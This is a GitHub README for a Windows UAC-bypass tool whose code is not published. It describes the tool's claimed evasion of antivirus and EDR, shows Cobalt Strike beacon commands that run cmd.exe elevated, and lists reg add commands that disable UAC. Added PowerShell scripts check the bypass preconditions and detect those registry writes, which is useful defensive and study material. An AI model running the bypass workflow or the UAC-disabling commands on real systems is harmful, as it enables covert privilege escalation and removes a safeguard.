# ByPassUACTools

Repository: https://github.com/Adminisme/ByPassUACTools (owner Adminisme, default branch `master`, last push 2024-06-24, no license file). Description: a UAC (User Account Control) bypass tool for Windows. Listing: https://awesome.ecosyste.ms/projects/github.com%2Fadminisme%2Fbypassuactools

![Author](https://img.shields.io/badge/Author-Trim-blueviolet) ![Author](https://img.shields.io/badge/Author-xiaoxiong-blueviolet) ![Bin](https://img.shields.io/badge/ByPassUACTools-Bin-ff69b4)  ![build](https://img.shields.io/badge/build-passing-green.svg)  ![language](https://img.shields.io/badge/language-C-blue.svg)

### Overview

- **A tool for bypassing UAC (User Account Control) restrictions on the Windows platform.**

- **Supports Windows 7 and later, including Server editions.**

- **Preconditions: the UAC protection level is at or below the default, and the current process runs as a user in the local Administrators group (with the filtered, non-elevated token UAC gives such users at logon).**

---

### Disclaimer

- **To discourage malicious use, the complete project source and binaries are not published; the repository mainly shares the approach for reference.**

---

### Design

UAC (User Account Control) is a security mechanism introduced in Windows Vista. It defines several levels of user access within the operating system and is meant to stop a malicious application or process running without administrator rights from reading or changing system-wide (administrator-level) configuration and resources. Microsoft does not treat UAC as a security boundary, so bypasses of this kind are generally not serviced as security vulnerabilities.

1. **Automatic detection of the runtime environment:**
     - checks whether UAC is enabled and whether the current UAC level satisfies the bypass condition;
     - checks whether the user of the current process has administrator rights;
2. **Core functions**:
     - runs a specified binary through a UAC bypass;
     - according to the author, none of the built-in bypass modules trigger EDR-agent or antivirus alerts when executed (a claim that depends on the products and detection content deployed on the target);
     - trace cleanup: after a module that drops files or modifies configuration has run, the tool deletes the dropped files and restores the modified settings before exiting.

---

### Demo

#### 1. Running a specified binary through a UAC bypass

> Example: starting `regedit.exe` on a system with security software installed and UAC enabled at its default level.

- Running it directly triggers the UAC consent prompt

<img src="imgs/image-20220328164120370.png" alt="image-20220328164120370" style="zoom:33%;" />

- Running `regedit.exe` through `ByPassUACTools.exe` bypasses UAC; the author states that this action also evades the antivirus product's system-defense detection.

<img src="imgs/image-20220328164148608.png" alt="image-20220328164148608" style="zoom: 50%;" />

#### 2. Cobalt Strike Reflective DLL in-memory loading: run a specified executable (with arguments) through the bypass

> Example: invoking `C:\Windows\System32\cmd.exe` with extra arguments so that it runs a given command

```
beacon> bypassuactools "C:\Windows\System32\cmd.exe --parmas /c echo test > C:\test.txt"
```

#### Demo walkthrough:

- Check whether UAC is enabled (`EnableLUA`)

```
beacon> shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
```

- Query the UAC level (`ConsentPromptBehaviorAdmin`)

```
beacon> shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
```

- Run a command that needs administrator rights to establish the baseline (creating a file in the root of `C:\` fails from a non-elevated token)

```
beacon> shell C:\Windows\System32\cmd.exe /c echo test > C:\test.txt

beacon> shell dir C:\test.txt
```

- Run the same command through bypassuactools

```
beacon> bypassuactools "C:\Windows\System32\cmd.exe --parmas /c echo test > C:\test.txt"
```

- Confirm the result

```
beacon> shell type C:\test.txt
```

<img src="imgs/image-20220328143949418.png" alt="image-20220328143949418" style="zoom:25%;" />

### Other:

#### 1. Added a method for permanently disabling UAC:

##### 1.1 Demo:

<img src="imgs/image-20220328212625548.png" alt="image-20220328212625548" style="zoom: 40%;" />

##### 1.2 How it works

> Note: all UAC settings live under the registry key below; the values are documented in the Group Policy Security Protocol specification, [MS-GPSB]:
>
> https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/12867da0-2e4e-4a4f-9dc4-84a7f354c8d9

```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
```

##### Key registry values:

- ConsentPromptBehaviorAdmin (the elevation-prompt behaviour for administrators, i.e. the UAC level; 5 is the default, 0 means elevate without prompting)

```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
```

- EnableLUA (turns UAC, i.e. Admin Approval Mode, on or off)

```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
```

- PromptOnSecureDesktop (whether the elevation prompt is shown on the secure desktop; 0 keeps the prompt but shows it on the normal interactive desktop instead of the dimmed one)

```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop"
```

##### Steps:

> Writing to this key requires an already-elevated token, so this is a post-bypass persistence step rather than a bypass in itself. The `ConsentPromptBehaviorAdmin` and `PromptOnSecureDesktop` changes apply to subsequent elevation requests without a reboot; setting `EnableLUA` to 0 only takes full effect after a restart.

```
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 0 /f
```

```
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
```

```
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d 0 /f
```
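The README's environment check (UAC on, level at or below default, caller in Administrators) and its list of the three policy values can both be exercised from the same script. The following is an added example written for this page, not code from the ByPassUACTools project: it reads the three values under the key named above, evaluates the stated preconditions, and, for the defender, reports any value weaker than the stock Windows default. The registry path and value names are the documented Windows policy locations the README cites; the function names and the `$UacSecureDefaults` table are my own.

```powershell
# Added example (not code from the ByPassUACTools project). Reads the three UAC policy
# values the README names and evaluates its preconditions: UAC on at or below the
# default level, and the caller an Administrators member running with the filtered
# (non-elevated) token. Function names and the defaults table are assumptions of this
# example; the registry path and value names are the documented Windows policy values.
$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Stock Windows defaults: Admin Approval Mode on, "prompt for consent for non-Windows
# binaries" (5), prompt shown on the secure desktop.
$UacSecureDefaults = [ordered]@{
    EnableLUA                  = 1
    ConsentPromptBehaviorAdmin = 5
    PromptOnSecureDesktop      = 1
}

function Get-UacPolicy {
    # The key is world-readable, so this works from a medium-integrity token.
    # An absent value means the policy default applies, which is the secure value.
    $props  = Get-ItemProperty -Path $UacKey -ErrorAction Stop
    $policy = [ordered]@{}
    foreach ($name in $UacSecureDefaults.Keys) {
        $raw = $props.$name
        $policy[$name] = if ($null -eq $raw) { $UacSecureDefaults[$name] } else { [int]$raw }
    }
    [pscustomobject]$policy
}

function Get-CallerAdminState {
    # whoami /groups still lists Administrators (S-1-5-32-544) for a filtered admin
    # token, marked "Group used for deny only", whereas WindowsIdentity.Groups omits
    # deny-only groups. Matching on the SID keeps the check locale-independent.
    $inAdmins  = [bool]((whoami /groups) -match '\bS-1-5-32-544\b')
    $principal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
    $elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    [pscustomobject]@{
        InAdministrators = $inAdmins
        Elevated         = $elevated
        # An Administrators member whose token fails the admin-role check is running
        # with the filtered token UAC creates at logon.
        TokenFiltered    = ($inAdmins -and -not $elevated)
    }
}

function Test-UacBypassPreconditions {
    $policy = Get-UacPolicy
    $caller = Get-CallerAdminState
    $uacOn  = $policy.EnableLUA -eq 1
    # "At or below default" per the README: the default slider position (5) or
    # "never notify" (0). The policy-only values 1-4 always prompt and are treated
    # here as stricter than default.
    $levelOk = $policy.ConsentPromptBehaviorAdmin -in 0, 5
    [pscustomobject]@{
        Policy                 = $policy
        UacEnabled             = $uacOn
        LevelAtOrBelowDefault  = $levelOk
        CallerInAdministrators = $caller.InAdministrators
        AlreadyElevated        = $caller.Elevated
        # Nothing to bypass if already elevated; nothing to elevate into if the
        # caller is not an Administrators member.
        PreconditionsMet       = ($uacOn -and $levelOk -and $caller.TokenFiltered)
    }
}

function Compare-UacPolicyToDefaults {
    # Defender's view of the same data: report each value that is weaker than the
    # stock default, which is exactly what the README's reg add commands produce.
    $policy = Get-UacPolicy
    foreach ($name in $UacSecureDefaults.Keys) {
        $current = $policy.$name
        # 0 weakens all three; ConsentPromptBehaviorAdmin 1-4 prompt more, not less.
        $weaker = if ($name -eq 'ConsentPromptBehaviorAdmin') { $current -eq 0 } else { $current -ne $UacSecureDefaults[$name] }
        if ($weaker) {
            [pscustomobject]@{ Value = $name; Current = $current; Default = $UacSecureDefaults[$name] }
        }
    }
}

Test-UacBypassPreconditions | Format-List
Compare-UacPolicyToDefaults | Format-Table -AutoSize
```

Run it from a normal (non-elevated) PowerShell window as the account under test; `PreconditionsMet` is true only when the account is an Administrators member whose current token is filtered, which is the situation the README's tool targets. Running the same script from an elevated window reports `AlreadyElevated` true, and `Compare-UacPolicyToDefaults` prints nothing on an untouched system.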
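The three `reg add` commands above are the kind of registry write a security team wants to catch in process-creation telemetry (Security Event ID 4688 with command-line logging, or Sysmon Event ID 1). As an added example written for this page, not code from the ByPassUACTools project, the following function flags any command line that writes a weakening value to those three names under the UAC policy key. It also covers the same writes made through `Set-ItemProperty`/`New-ItemProperty`, a generalization beyond the page's reg.exe form. The sample command lines are constructed for the example; the function and variable names are my own.

```powershell
# Added example (not code from the ByPassUACTools project). Flags the UAC-disabling
# registry writes from the README as they appear in process-creation command lines,
# for both the reg.exe form on the page and the equivalent PowerShell cmdlets. The
# sample command lines at the bottom are constructed; function names are assumptions.
$UacPolicyKeyPattern = '(?i)SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'

# Stock defaults; a write that moves one of these toward "no prompt" is the README's
# "permanently disable UAC" step (MITRE ATT&CK T1548.002 context).
$UacSecureDefaults = @{
    EnableLUA                  = 1
    ConsentPromptBehaviorAdmin = 5
    PromptOnSecureDesktop      = 1
}

function ConvertTo-RegDword([string]$Text) {
    # reg.exe accepts decimal or 0x-prefixed hex for REG_DWORD data.
    if ($Text -match '^(?i)0x') { [Convert]::ToInt32($Text, 16) } else { [int]$Text }
}

function Find-UacTamperCommand {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$CommandLine)
    process {
        if ($CommandLine -notmatch $UacPolicyKeyPattern) { return }
        $name = $null; $data = $null
        # reg.exe form used on the page: reg add <key> /v <name> /t REG_DWORD /d <n> /f
        if ($CommandLine -match '(?i)\breg(\.exe)?\s+add\b.*?/v\s+"?(?<name>\w+)"?.*?/d\s+"?(?<data>0x[0-9a-f]+|\d+)') {
            $name = $Matches['name']; $data = ConvertTo-RegDword $Matches['data']
        }
        # PowerShell form: Set-ItemProperty -Path <key> -Name <name> -Value <n>
        elseif ($CommandLine -match '(?i)\b(Set|New)-ItemProperty\b.*?-Name\s+"?(?<name>\w+)"?.*?-Value\s+"?(?<data>0x[0-9a-f]+|\d+)') {
            $name = $Matches['name']; $data = ConvertTo-RegDword $Matches['data']
        }
        if (-not $name -or -not $UacSecureDefaults.ContainsKey($name)) { return }
        # Setting 0 weakens all three; ConsentPromptBehaviorAdmin 1-4 prompt more
        # often than the default and are not flagged.
        $weakens = if ($name -eq 'ConsentPromptBehaviorAdmin') { $data -eq 0 } else { $data -ne $UacSecureDefaults[$name] }
        if ($weakens) {
            [pscustomobject]@{
                Value       = $name
                Data        = $data
                Default     = $UacSecureDefaults[$name]
                CommandLine = $CommandLine
            }
        }
    }
}

# Constructed sample command lines: two of the README's reg add commands, the third
# value written via PowerShell, a restore-to-default write, and a read-only query.
# Only the first three should be reported.
$SampleCommandLines = @(
    'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F'
    'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F'
    'powershell -nop -c "Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0"'
    'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0x5 /f'
    'reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA'
)

$SampleCommandLines | Find-UacTamperCommand | Format-Table -AutoSize
```

In production the pipeline input would be the `CommandLine` field of 4688 or Sysmon events rather than a constructed array. The value-by-value check matters: a write of `ConsentPromptBehaviorAdmin` to 5 (the fourth sample) is a restore, not tampering, so a rule that simply alerts on any write to the key would be noisy on every hardening or Group Policy refresh.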